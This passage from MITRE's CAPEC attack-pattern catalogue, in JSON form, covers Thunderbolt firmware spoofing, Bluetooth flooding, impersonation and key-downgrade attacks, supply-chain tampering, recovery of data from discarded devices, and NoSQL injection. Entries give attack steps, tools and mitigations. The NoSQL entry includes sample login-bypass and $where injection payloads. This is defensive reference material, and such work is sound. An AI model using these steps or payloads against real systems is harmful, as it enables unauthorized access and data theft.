modification/spoofing of adversary-controlled Thunderbolt controller.","Precrafted scripts/tools capable of implementing the modification and replacement of Thunderbolt Firmware.","Thunderbolt-enabled computing device capable of interfacing with target Thunderbolt device and extracting/dumping data and memory contents of target device."]},"Indicators":{"Indicator":"Windows Event logs may document the access of Thunderbolt port as a USB 3.0 event as well as any malicious actions taken upon target device as file system and memory events."},"Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands"}]},"Mitigations":{"Mitigation":["Implementation: Kernel Direct Memory Access Protection","Configuration: Enable UEFI option USB Passthrough mode - Thunderbolt 3 system port operates as USB 3.1 Type C interface","Configuration: Enable UEFI option DisplayPort mode - Thunderbolt 3 system port operates as video-only DP interface","Configuration: Enable UEFI option Mixed USB/DisplayPort mode - Thunderbolt 3 system port operates as USB 3.1 Type C interface with support for DP mode","Configuration: Set Security Level to SL3 for Thunderbolt 2 system port","Configuration: Disable PCIe tunneling to set Security Level to SL3","Configuration: Disable Boot Camp upon MacOS systems"]},"Example_Instances":{"Example":{"p":"An adversary steals a password protected laptop that contains a Thunderbolt 3 enabled port, from a work environment. The adversary uses a screw driver to remove the back panel of the laptop and connects a SPI Programming device to the Thunderbolt Host Controller SPI Flash of the stolen victim device to interface with it on the adversary\'s own Thunderbolt enabled device via Thunderbolt cables. The SPI Programming device is utilized to execute scripts/tools from the adversary\'s own system to copy, parse, and modify the victim\'s Thunderbolt firmware stored on SPI Flash. The device UUID value is obtained, by computing the appropriate offset based upon Thunderbolt firmware version and the OS of victim device, from the DROM section of victim Thunderbolt host controller firmware image. The firmware image is written to adversary Thunderbolt host controller SPI flash to clone and spoof victim device identity. The adversary reboots the victim device, with the victim device identifying the Thunderbolt connection of the adversary\'s Thunderbolt device as itself and enables PCIe tunneling. The adversary finally transfers the hard drive and memory contents of victim device across Thunderbolt connection."}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"345"},{"CWE_ID":"353"},{"CWE_ID":"288"},{"CWE_ID":"1188"},{"CWE_ID":"862"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"T1495","Entry_Name":"Firmware Corruption"},{"Taxonomy_Name":"ATTACK","Entry_ID":"T1211","Entry_Name":"Exploitation for Defensive Evasion"},{"Taxonomy_Name":"ATTACK","Entry_ID":"T1556","Entry_Name":"Modify Authentication Process"}]},"References":{"Reference":[{"External_Reference_ID":"REF-647"},{"External_Reference_ID":"REF-648"},{"External_Reference_ID":"REF-649"},{"External_Reference_ID":"REF-650"},{"External_Reference_ID":"REF-651"},{"External_Reference_ID":"REF-652"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-06-24"}}},"666":{"ID":"666","Name":"BlueSmacking","Abstraction":"Standard","Status":"Draft","Description":"An adversary uses Bluetooth flooding to transfer large packets to Bluetooth enabled devices over the L2CAP protocol with the goal of creating a DoS. This attack must be carried out within close proximity to a Bluetooth enabled device.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"125"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Scan for Bluetooth Enabled Devices] Using BlueZ along with an antenna, an adversary searches for devices with Bluetooth on.","Technique":"Note the MAC address of the device you want to attack."},{"Step":"2","Phase":"Experiment","Description":"[Change L2CAP Packet Length] The adversary must change the L2CAP packet length to create packets that will overwhelm a Bluetooth enabled device.","Technique":"An adversary downloads and installs BlueZ, the standard Bluetooth utility package for Linux."},{"Step":"3","Phase":"Exploit","Description":"[Flood] An adversary sends the packets to the target device, and floods it until performance is degraded."}]},"Prerequisites":{"Prerequisite":"The system/application has Bluetooth enabled."},"Skills_Required":{"Skill":["An adversary only needs a Linux machine along with a Bluetooth adapter, which is extremely common.",{"Level":"Low"}]},"Indicators":{"Indicator":"Performance is degraded or halted by incoming L2CAP packets."},"Consequences":{"Consequence":{"Scope":"Availability","Impact":["Unreliable Execution","Resource Consumption"]}},"Mitigations":{"Mitigation":["Disable Bluetooth when not being used.","When using Bluetooth, set it to hidden or non-discoverable mode."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"404"}},"References":{"Reference":{"External_Reference_ID":"REF-655"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-06-24"}}},"667":{"ID":"667","Name":"Bluetooth Impersonation AttackS (BIAS)","Abstraction":"Detailed","Status":"Draft","Description":"An adversary disguises the MAC address of their Bluetooth enabled device to one for which there exists an active and trusted connection and authenticates successfully. The adversary can then perform malicious actions on the target Bluetooth device depending on the target\u2019s capabilities.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"616","Exclude_Related":[{"Exclude_ID":"512"},{"Exclude_ID":"513"},{"Exclude_ID":"515"}]}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Find disguise and target] The adversary starts the Bluetooth service on the attacking device and searches for nearby listening devices.","Technique":["Knowledge of a trusted MAC address.","Scanning for devices other than the target that may be trusted."]},{"Step":"2","Phase":"Experiment","Description":"[Disguise] Using the MAC address of the device the adversary wants to impersonate, they may use a tool such as spooftooth or macchanger to spoof their Bluetooth address and attempt to authenticate with the target."},{"Step":"3","Phase":"Exploit","Description":"[Use device capabilities to accomplish goal] Finally, if authenticated successfully the adversary can perform tasks/information gathering dependent on the target\'s capabilities and connections."}]},"Prerequisites":{"Prerequisite":"Knowledge of a target device\'s list of trusted connections."},"Skills_Required":{"Skill":["Adversaries must be capable of using command line Linux tools.",{"Level":"Low"},"Adversaries must be in close proximity to Bluetooth devices.",{"Level":"Low"}]},"Consequences":{"Consequence":[{"Scope":"Integrity","Note":"An adversary will be impersonating another Bluetooth device, and may gain access to information pertaining to that user along with the ability to manipulate other information."},{"Scope":"Confidentiality","Note":"An adversary will have unauthorized access to information."}]},"Mitigations":{"Mitigation":["Disable Bluetooth in public places.","Verify incoming Bluetooth connections; do not automatically trust.","Change default PIN passwords and always use one when connecting."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"290"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-06-24"}}},"668":{"ID":"668","Name":"Key Negotiation of Bluetooth Attack (KNOB)","Abstraction":"Standard","Status":"Draft","Description":"An adversary can exploit a flaw in Bluetooth key negotiation allowing them to decrypt information sent between two devices communicating via Bluetooth. The adversary uses an Adversary in the Middle setup to modify packets sent between the two devices during the authentication process, specifically the entropy bits. Knowledge of the number of entropy bits will allow the attacker to easily decrypt information passing over the line of communication.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"115"},{"Nature":"CanPrecede","CAPEC_ID":"148"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Discovery] Using an established Person in the Middle setup, search for Bluetooth devices beginning the authentication process.","Technique":"Use packet capture tools."},{"Step":"2","Phase":"Experiment","Description":"[Change the entropy bits] Upon recieving the initial key negotiation packet from the master, the adversary modifies the entropy bits requested to 1 to allow for easy decryption before it is forwarded."},{"Step":"3","Phase":"Exploit","Description":"[Capture and decrypt data] Once the entropy of encryption is known, the adversary can capture data and then decrypt on their device."}]},"Prerequisites":{"Prerequisite":"Person in the Middle network setup."},"Skills_Required":{"Skill":["Ability to modify packets.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"Bluetooth adapter, packet capturing capabilities."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":"Newer Bluetooth firmwares ensure that the KNOB is not negotaited in plaintext. Update your device."},"Example_Instances":{"Example":"Given users Alice, Bob and Charlie (Charlie being the attacker), Alice and Bob begin to agree on an encryption key when connecting. While Alice sends a message to Bob that an encryption key with 16 bytes of entropy should be used, Charlie changes this to 1 and forwards the request to Bob and continues forwarding these packets until authentication is successful."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"425"},{"CWE_ID":"285"},{"CWE_ID":"693"}]},"References":{"Reference":{"External_Reference_ID":"REF-657"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-06-24"}}},"669":{"ID":"669","Name":"Alteration of a Software Update","Abstraction":"Standard","Status":"Draft","Description":{"p":"An adversary with access to an organization\u2019s software update infrastructure inserts malware into the content of an outgoing update to fielded systems where a wide range of malicious effects are possible. With the same level of access, the adversary can alter a software update to perform specific malicious acts including granting the adversary control over the software\u2019s normal functionality."},"Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"184"},{"Nature":"CanPrecede","CAPEC_ID":"673"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify software with frequent updates] The adversary must first identify a target software that has updates at least with some frequency, enough that there is am update infrastructure."},{"Step":"2","Phase":"Experiment","Description":"[Gain access to udpate infrastructure] The adversary must then gain access to the organization\'s software update infrastructure. This can either be done by gaining remote access from outside the organization, or by having a malicious actor inside the organization gain access. It is often easier if someone within the organization gains access."},{"Step":"3","Phase":"Exploit","Description":"[Alter the software update] Through access to the software update infrastructure, an adversary will alter the software update by injecting malware into the content of an outgoing update."}]},"Prerequisites":{"Prerequisite":"An adversary would need to have penetrated an organization\u2019s software update infrastructure including gaining access to components supporting the configuration management of software versions and updates related to the software maintenance of customer systems."},"Skills_Required":{"Skill":["Skills required include the ability to infiltrate the organization\u2019s software update infrastructure either from the Internet or from within the organization, including subcontractors, and be able to change software being delivered to customer/user systems in an undetected manner.",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Gain Privileges"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["Have a Software Assurance Plan that includes maintaining strict configuration management control of source code, object code and software development, build and distribution tools; manual code reviews and static code analysis for developmental software; and tracking of all storage and movement of code.","Require elevated privileges for distribution of software and software updates."]},"Example_Instances":{"Example":{"p":"A subcontractor to a software developer injects maliciously altered software updates into an automated update process that distributes to government and commercial customers software containing a hidden backdoor."}},"References":{"Reference":[{"External_Reference_ID":"REF-658"},{"External_Reference_ID":"REF-659"},{"External_Reference_ID":"REF-660"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-06-24"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}}},"670":{"ID":"670","Name":"Software Development Tools Maliciously Altered","Abstraction":"Detailed","Status":"Draft","Description":"An adversary with the ability to alter tools used in a development environment causes software to be developed with maliciously modified tools. Such tools include requirements management and database tools, software design tools, configuration management tools, compilers, system build tools, and software performance testing and load testing tools. The adversary then carries out malicious acts once the software is deployed including malware infection of other systems to support further compromises.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"444","Exclude_Related":{"Exclude_ID":"515"}},{"Nature":"CanPrecede","CAPEC_ID":"669"}]},"Prerequisites":{"Prerequisite":"An adversary would need to have access to a targeted developer\u2019s development environment and in particular to tools used to design, create, test and manage software, where the adversary could ensure malicious code is included in software packages built through alteration or substitution of tools in the environment used in the development of software."},"Skills_Required":{"Skill":["Ability to leverage common delivery mechanisms (e.g., email attachments, removable media) to infiltrate a development environment to gain access to software development tools for the purpose of malware insertion into an existing tool or replacement of an existing tool with a maliciously altered copy.",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Execute Unauthorized Commands"},{"Scope":"Access Control","Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":["Modify Data","Read Data"]}]},"Mitigations":{"Mitigation":["Have a security concept of operations (CONOPS) for the development environment that includes: Maintaining strict security administration and configuration management of requirements management and database tools, software design tools, configuration management tools, compilers, system build tools, and software performance testing and load testing tools.","Avoid giving elevated privileges to developers."]},"Example_Instances":{"Example":"An adversary with access to software build tools inside an Integrated Development Environment IDE alters a script used for downloading dependencies from a dependent code repository where the script has been changed to include malicious code implanted in the repository by the adversary."},"References":{"Reference":[{"External_Reference_ID":"REF-660"},{"External_Reference_ID":"REF-661"},{"External_Reference_ID":"REF-667"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-06-24"}}},"671":{"ID":"671","Name":"Requirements for ASIC Functionality Maliciously Altered","Abstraction":"Detailed","Status":"Draft","Description":"An adversary with access to functional requirements for an application specific integrated circuit (ASIC), a chip designed/customized for a singular particular use, maliciously alters requirements derived from originating capability needs. In the chip manufacturing process, requirements drive the chip design which, when the chip is fully manufactured, could result in an ASIC which may not meet the user\u2019s needs, contain malicious functionality, or exhibit other anomalous behaviors thereby affecting the intended use of the ASIC.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"447"}},"Prerequisites":{"Prerequisite":"An adversary would need to have access to a foundry\u2019s or chip maker\u2019s requirements management system that stores customer requirements for ASICs, requirements upon which the design of the ASIC is based."},"Skills_Required":{"Skill":["An adversary would need experience in designing chips based on functional requirements in order to manipulate requirements in such a way that deviations would not be detected in subsequent stages of ASIC manufacture and where intended malicious functionality would be available to the adversary once integrated into a system and fielded.",{"Level":"High"}]},"Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Alter Execution Logic"}},"Mitigations":{"Mitigation":["Utilize DMEA\u2019s (Defense Microelectronics Activity) Trusted Foundry Program members for acquisition of microelectronic components.","Ensure that each supplier performing hardware development implements comprehensive, security-focused configuration management including for hardware requirements and design.","Require that provenance of COTS microelectronic components be known whenever procured.","Conduct detailed vendor assessment before acquiring COTS hardware."]},"Example_Instances":{"Example":"An adversary with access to ASIC functionality requirements for various customers, targets a particular customer\u2019s ordered lot of ASICs by altering its functional requirements such that the ASIC design will result in a manufactured chip that does not meet the customer\u2019s capability needs."},"References":{"Reference":{"External_Reference_ID":"REF-661"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-06-24"}}},"672":{"ID":"672","Name":"Malicious Code Implanted During Chip Programming","Abstraction":"Detailed","Status":"Draft","Description":{"p":"During the programming step of chip manufacture, an adversary with access and necessary technical skills maliciously alters a chip\u2019s intended program logic to produce an effect intended by the adversary when the fully manufactured chip is deployed and in operational use. Intended effects can include the ability of the adversary to remotely control a host system to carry out malicious acts."},"Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"444"}},"Prerequisites":{"Prerequisite":"An adversary would need to have access to a foundry\u2019s or chip maker\u2019s development/production environment where programs for specific chips are developed, managed and uploaded into targeted chips prior to distribution or sale."},"Skills_Required":{"Skill":["An adversary needs to be skilled in microprogramming, manipulation of configuration management systems, and in the operation of tools used for the uploading of programs into chips during manufacture. Uploading can be for individual chips or performed on a large scale basis.",{"Level":"Medium"}]},"Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Alter Execution Logic"}},"Mitigations":{"Mitigation":["Utilize DMEA\u2019s (Defense Microelectronics Activity) Trusted Foundry Program members for acquisition of microelectronic components.","Ensure that each supplier performing hardware development implements comprehensive, security-focused configuration management of microcode and microcode generating tools and software.","Require that provenance of COTS microelectronic components be known whenever procured.","Conduct detailed vendor assessment before acquiring COTS hardware."]},"Example_Instances":{"Example":{"p":"Following a chip\u2019s production process steps of test and verification and validation of chip circuitry, an adversary involved in the generation of microcode defining the chip\u2019s function(s) inserts a malicious instruction that will become part of the chip\u2019s program. When integrated into a system, the chip will produce an effect intended by the adversary."}},"References":{"Reference":{"External_Reference_ID":"REF-662"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-06-24"}}},"673":{"ID":"673","Name":"Developer Signing Maliciously Altered Software","Abstraction":"Detailed","Status":"Draft","Description":{"p":["Software produced by a reputable developer is clandestinely infected with malicious code and then digitally signed by the unsuspecting developer, where the software has been altered via a compromised software development or build process prior to being signed. The receiver or user of the software has no reason to believe that it is anything but legitimate and proceeds to deploy it to organizational systems.","This attack differs from CAPEC-206, since the developer is inadvertently signing malicious code they believe to be legitimate and which they are unware of any malicious modifications."]},"Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"444","Exclude_Related":{"Exclude_ID":"515"}}},"Prerequisites":{"Prerequisite":"An adversary would need to have access to a targeted developer\u2019s software development environment, including to their software build processes, where the adversary could ensure code maliciously tainted prior to a build process is included in software packages built."},"Skills_Required":{"Skill":["The adversary must have the skills to infiltrate a developer\u2019s software development/build environment and to implant malicious code in developmental software code, a build server, or a software repository containing dependency code, which would be referenced to be included during the software build process.",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality"],"Impact":["Read Data","Modify Data"]},{"Scope":["Access Control","Authorization"],"Impact":["Gain Privileges","Execute Unauthorized Commands"]}]},"Mitigations":{"Mitigation":["Have a security concept of operations (CONOPS) for the IDE that includes: Protecting the IDE via logical isolation using firewall and DMZ technologies/architectures; Maintaining strict security administration and configuration management of configuration management tools, developmental software and dependency code repositories, compilers, and system build tools.","Employ intrusion detection and malware detection capabilities on IDE systems where feasible."]},"Example_Instances":{"Example":{"p":"An adversary who has infiltrated an organization\u2019s build environment maliciously alters code intended to be included in a product\u2019s software build via software dependency inclusion, part of the software build process. When the software product has been built, the developer electronically signs the finished product using their signing key. The recipient of the software product, an end user/customer, believes the software to reflect the developer\u2019s intent with respect to functionality unaware of the adversary\u2019s malicious intent harbored within."}},"References":{"Reference":[{"External_Reference_ID":"REF-658"},{"External_Reference_ID":"REF-659"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-06-24"}}},"674":{"ID":"674","Name":"Design for FPGA Maliciously Altered","Abstraction":"Detailed","Status":"Stable","Description":{"p":"An adversary alters the functionality of a field-programmable gate array (FPGA) by causing an FPGA configuration memory chip reload in order to introduce a malicious function that could result in the FPGA performing or enabling malicious functions on a host system. Prior to the memory chip reload, the adversary alters the program for the FPGA by adding a function to impact system operation."},"Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"447"}},"Prerequisites":{"Prerequisite":"An adversary would need to have access to FPGA programming/configuration-related systems in a chip maker\u2019s development environment where FPGAs can be initially configured prior to delivery to a customer or have access to such systems in a customer facility where end-user FPGA configuration/reconfiguration can be performed."},"Skills_Required":{"Skill":["An adversary would need to be skilled in FPGA programming in order to create/manipulate configurations in such a way that when loaded into an FPGA, the end user would be able to observe through testing all user-defined required functions but would be unaware of any additional functions the adversary may have introduced.",{"Level":"High"}]},"Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Alter Execution Logic"}},"Mitigations":{"Mitigation":["Utilize DMEA\u2019s (Defense Microelectronics Activity) Trusted Foundry Program members for acquisition of microelectronic components.","Ensure that each supplier performing hardware development implements comprehensive, security-focused configuration management including for FPGA programming and program uploads to FPGA chips.","Require that provenance of COTS microelectronic components be known whenever procured.","Conduct detailed vendor assessment before acquiring COTS hardware."]},"Example_Instances":{"Example":{"p":"An adversary with access and the ability to alter the configuration/programming of FPGAs in organizational systems, introduces a trojan backdoor that can be used to alter the behavior of the original system resulting in, for example, compromise of confidentiality of data being processed."}},"References":{"Reference":[{"External_Reference_ID":"REF-660"},{"External_Reference_ID":"REF-661"},{"External_Reference_ID":"REF-662"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-06-24"}}},"675":{"ID":"675","Name":"Retrieve Data from Decommissioned Devices","Abstraction":"Standard","Status":"Stable","Description":{"p":"An adversary obtains decommissioned, recycled, or discarded systems and devices that can include an organization\u2019s intellectual property, employee data, and other types of controlled information. Systems and devices that have reached the end of their lifecycles may be subject to recycle or disposal where they can be exposed to adversarial attempts to retrieve information from internal memory chips and storage devices that are part of the system."},"Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"116"},{"Nature":"CanPrecede","CAPEC_ID":"37"}]},"Prerequisites":{"Prerequisite":"An adversary needs to have access to electronic data processing equipment being recycled or disposed of (e.g., laptops, servers) at a collection location and the ability to take control of it for the purpose of exploiting its content."},"Skills_Required":{"Skill":["An adversary may need the ability to mount printed circuit boards and target individual chips for exploitation.",{"Level":"High"},"An adversary needs the technical skills required to extract solid state drives, hard disk drives, and other storage media to host on a compatible system or harness to gain access to digital content.",{"Level":"Medium"}]},"Consequences":{"Consequence":{"Scope":"Accountability","Impact":"Bypass Protection Mechanism"}},"Example_Instances":{"Example":{"p":"A company is contracted by an organization to provide data destruction services for solid state and hard disk drives being discarded. Prior to destruction, an adversary within the contracted company copies data from select devices, violating the data confidentiality requirements of the submitting organization."}},"References":{"Reference":{"External_Reference_ID":"REF-663"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-06-24"}}},"676":{"ID":"676","Name":"NoSQL Injection","Abstraction":"Standard","Status":"Stable","Description":{"p":"An adversary targets software that constructs NoSQL statements based on user input or with parameters vulnerable to operator replacement in order to achieve a variety of technical impacts such as escalating privileges, bypassing authentication, and/or executing code."},"Extended_Description":{"p":["NoSQL database calls are written in an application\'s programming language, via a custom API call, or formatted in a common convention (e.g., JSON, XML, etc.), any of which the adversary can exploit to achieve the aforementioned goals. NoSQL attacks usually result from improper sanitization and validation of data that originates from a user, either via special character or JavaScript injection. In both cases, the adversary crafts input strings so that when the target software constructs NoSQL statements based on the input, the resulting NoSQL statement performs actions other than those intended by the application. However, unlike traditional SQL Injection attacks, NoSQL injection attacks can also occur in instances where the application does not rely upon user input, as is the case in operator replacements. This entails the adversary overriding reserved NoSQL variable names with ones that have been modified with malicious functionality (e.g., $where in MongoDB). In all cases, depending on the NoSQL API and data model used, successful injection can cause information disclosure, data modification, and code execution at the application level.","Note: NoSQL Injection attacks are executed within a procedural language (e.g., C, C++, Perl), as opposed to the declarative SQL language itself. As a result, NoSQL injection attacks can potentially result in greater impacts than traditional SQL Injection attacks [REF-668]."]},"Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"248"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey target application] Due to the number of NoSQL databases available and the numerous language/API combinations of each, the adversary must first survey the target application to learn what technologies are being leveraged and how they interact with user-driven data.","Technique":["Determine the technology stack leveraged by the target application, such as the application server, drivers, frameworks, APIs, and databases being utilized.","Identify areas of the application that interact with user input and may be involved with NoSQL queries."]},{"Step":"2","Phase":"Experiment","Description":"[Identify user-controllable input susceptible to injection] After identifying the technology stack being used and where user-driven input is leveraged, determine the user-controllable input susceptible to injection such as authentication or search forms. For each user-controllable input that the adversary suspects is vulnerable to NoSQL injection, attempt to inject characters or keywords that have special meaning in the given NoSQL database or language (e.g., \\"$ne\\" for MongoDB or \\"$exists\\" for PHP/MongoDB), or JavaScript that can be executed within the application. The goal is to create a NoSQL query with an invalid syntax.","Technique":["Use web browser to inject input through text fields or through HTTP GET parameters.","Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, etc.","Use network-level packet injection tools such as netcat to inject input","Use modified client (modified by reverse engineering) to inject input."]},{"Step":"3","Phase":"Experiment","Description":"[Experiment with NoSQL Injection vulnerabilities] After determining that a given input is vulnerable to NoSQL Injection, hypothesize what the underlying query looks like. Iteratively try to add logic to the query to extract information from the database, modify/delete information in the database, or execute commands on the server.","Technique":["Use public resources such as OWASP\'s \\"Testing for NoSQL Injection\\" [REF-668] or Null Sweep\'s \\"NoSQL Injection Cheatsheet\\" [REF-669] and try different approaches for adding logic to NoSQL queries.","Iteratively add logic to the NoSQL query and use detailed error messages from the server to debug the query.","Attempt an HTTP Parameter Pollution attack to replace language-specific keywords, such as \\"where\\" within PHP [CAPEC-460]."]},{"Step":"4","Phase":"Exploit","Description":"[Exploit NoSQL Injection vulnerability] After refining and adding various logic to NoSQL queries, craft and execute the underlying NoSQL query that will be used to attack the target system.","Technique":"Craft and Execute underlying NoSQL query"}]},"Prerequisites":{"Prerequisite":["Awareness of the technology stack being leveraged by the target application.","NoSQL queries used by the application to store, retrieve, or modify data.","User-controllable input that is not properly validated by the application as part of NoSQL queries.","Target potentially susceptible to operator replacement attacks."]},"Skills_Required":{"Skill":["For keyword and JavaScript injection attacks, it is fairly simple for someone with basic NoSQL knowledge to perform NoSQL injection, once the target\'s technology stack has been determined.",{"Level":"Low"},"For operator replacement attacks, the adversary must also have knowledge of HTTP Parameter Pollution attacks and how to conduct them.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Indicators":{"Indicator":["Too many false or invalid queries to the database, especially those caused by malformed input.","Executed queries or commands that appear to malicious in nature or originating from an untrustworthy source."]},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as relevant NoSQL and JavaScript content. NoSQL-specific keywords, such as $ne, $eq or $gt for MongoDB, must be filtered in addition to characters such as a single-quote(\') or semicolons (;) based on the context in which they appear. Validation should also extend to expected types.","If possible, leverage safe APIs (e.g., PyMongo and Flask-PyMongo for Python and MongoDB) for queries as opposed to building queries from strings.","Ensure the most recent version of a NoSQL database and it\'s corresponding API are used by the application.","Use of custom error pages - Adversaries can glean information about the nature of queries from descriptive error messages. Input validation must be coupled with customized error pages that inform about an error without disclosing information about the database or application.","Exercise the principle of Least Privilege with regards to application accounts to minimize damage if a NoSQL injection attack is successful.","If using MongoDB, disable server-side JavaScript execution and leverage a sanitization module such as \\"mongo-sanitize\\".","If using PHP with MongoDB, ensure all special query operators (starting with $) use single quotes to prevent operator replacement attacks.","Additional mitigations will depend on the NoSQL database, API, and programming language leveraged by the application."]},"Example_Instances":{"Example":[{"p":["The following examples primarily cite MongoDB, PHP, and NodeJS attacks due to their prominence and popularity. However, please note that these attacks are not exclusive to this NoSQL instance, programming language, or runtime framework.","Within NodeJS, Login Bypass attacks are possible via MongoDB if user-input is not properly validated and sanitized [REF-670].","The above code works fine if the user were to submit a query like the following:","https://example.org/login?user=patrick&password=1234","But an adversary could submit a malicious query such as the below, which would be interpreted by the code as follows:","https://example.org/login?user=patrick&password[$ne]=","This will result in a Login Bypass attack, as the query will succeed for all values where Bob\'s password is not an empty string."],"div":["//NodeJS with Express.js",{"style":"margin-left:10px;","class":"bad","div":["db.collection(\'users\').find({",{"style":"margin-left:10px;","div":["\\"user\\": req.query.user,",{"style":"margin-left:10px;"}]}]},"//NodeJS with Express.js",{"style":"margin-left:10px;","class":"attack","div":["db.collection(\'users\').find({",{"style":"margin-left:10px;","div":["\\"user\\": bob,",{"style":"margin-left:10px;"}]}]}]},{"p":["MongoDB instances are also vulnerable to JavaScript Injection Attacks when user input is not properly validated and sanitized.","If the user properly specifies a username, then this code will execute as intended. However, an adversary can inject JavaScript into the \\"$username\\" variable to achieve a NoSQL Injection attack as follows:","This will result in the server sleeping for 5 seconds if the attack was successful. An adversary could supply a larger value to deny service to the application."],"div":["//PHP with MongoDB",{"style":"margin-left:10px;","class":"bad","div":["db.collection.find({$where: function() {",{"style":"margin-left:10px;","div":["return (this.username == $username) } } );",{"style":"margin-left:10px;"}]}]},"//PHP with MongoDB",{"style":"margin-left:10px;","class":"attack","div":["db.collection.find({$where: function() {",{"style":"margin-left:10px;","div":["return (this.username == \'foo\'; sleep(5000) ) } } );",{"style":"margin-left:10px;"}]}]}]},{"p":["If leveraging PHP with MongoDB, operator replacement attacks are possible if special query operators are not properly addressed. The below example from OWASP\'s \\"Test for NoSQL Injection\\" displays a simple case of how this could occur.[REF-668]","Even though the above query does not depend on any user input, it is vulnerable to a NoSQL injection attack via operator replacement on the \\"$where\\" keyword. In this case, the adversary could exploit MongoDB in the following manner:"],"div":["db.myCollection.find({$where: function() {",{"style":"margin-left:10px;","class":"bad","div":["return obj.credits - obj.debits < 0; } } 